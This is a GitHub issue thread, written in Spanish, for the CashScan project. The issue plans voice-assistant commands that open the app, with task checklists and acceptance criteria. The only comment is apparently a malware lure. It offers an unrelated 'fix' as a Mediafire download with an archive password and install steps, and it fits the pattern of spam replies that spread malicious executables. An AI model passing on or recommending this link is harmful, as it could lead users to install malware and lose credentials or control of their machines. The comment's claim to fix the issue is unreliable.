### ISSUE TITLE
4.7 Adaptar la Aplicación para Abrir con Comandos de Voz (Asistente)

### ISSUE THREAD

**Issue by macasteglione** [macasteglione/CashScan#14]
## Descripción

Implementar la integración de comandos de voz para permitir a los usuarios abrir la aplicación mediante asistentes de voz. Esta funcionalidad mejorará la accesibilidad de la aplicación.

### 1. Implementación de Comandos de Voz:

- [ ] Configurar los comandos de voz necesarios para abrir la aplicación. Esto puede incluir la configuración de palabras clave específicas.
- [ ] Desarrollar el código necesario para interpretar los comandos de voz y abrir la aplicación en respuesta.

### 2. Configuración de Permisos y Autorizaciones

- [ ] Implementar los permisos necesarios para permitir que el asistente de voz acceda y abra la aplicación.

### 3. Pruebas de Integración de Comandos de Voz

- [ ] Realizar pruebas para asegurar que los comandos de voz funcionen correctamente para abrir la aplicación.
- [ ] Verificar la compatibilidad con diferentes asistentes de voz y dispositivos.

## Criterios de aceptación

* Los comandos de voz deben funcionar correctamente para abrir la aplicación.
* La integración debe ser compatible con los principales asistentes de voz.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
